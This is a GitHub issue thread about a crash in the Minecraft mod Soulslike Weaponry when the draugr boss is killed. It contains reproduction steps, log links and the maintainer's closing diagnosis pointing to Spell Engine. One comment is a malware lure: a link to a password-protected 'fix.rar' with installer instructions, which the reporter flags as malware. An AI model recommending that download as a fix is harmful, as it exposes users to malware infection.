### ISSUE TITLE
[BUG/CRASH] Killing soulsweapons:draugr_boss

### ISSUE THREAD

**Issue by NFLD99** [mariumbacchus/Soulslike-Weaponry#181]
**Minecraft, modloader and mod versions**
Example:
Minecraft: 1.20.1
Fabric: 0.15.11
Soulslike-Weaponry: [[1.20.1] SW-1.1.4.2 fabric](https://www.curseforge.com/minecraft/mc-mods/mariums-soulslike-weaponry/files/5605941)

**Describe the bug**
killing the soulsweapons:draugr_boss sometimes ends in the player being perma crashed when rejoining, 

**Add logs**
latest crash: https://gist.githubusercontent.com/NFLD99/72ca72006212df16fdd3e7c8b9395319/raw/8476aa87937fcdf82a0c5368cc7b85850a8acd7f/latest.log
player.dat: https://uploads.nfld99.com/ShareX/4b2ed080-0d54-4917-b304-ad5c1c76d0f6.dat

**To Reproduce**
1. /summon soulsweapons:draugr_boss
2. /kill @e[type=soulsweapons:draugr_boss]
3. crash

**Expected behavior**
you get teh loot and not crash

**Screenshots and videos**
N/A

**Other mods or relevant info**
Modpack used: [Fluffcraft 1.1.27](https://www.curseforge.com/minecraft/modpacks/fluffcraft)

**Comment by NFLD99** [comment]
UPDATE, its just having 2 of the draugr swords in the players inventory that causes the crash

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NFLD99** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

^ malware

**Comment by mariumbacchus** [comment]
The crash log mentions spell engine as the culprit of the crash. Does it only happen with the Draugr?

**Comment by mariumbacchus** [comment]
I will close this due to inactivity and since it seems to be a Spell Engine specific issue, so make a post on their github. Make a new post here if there is something for me to fix on this issue.
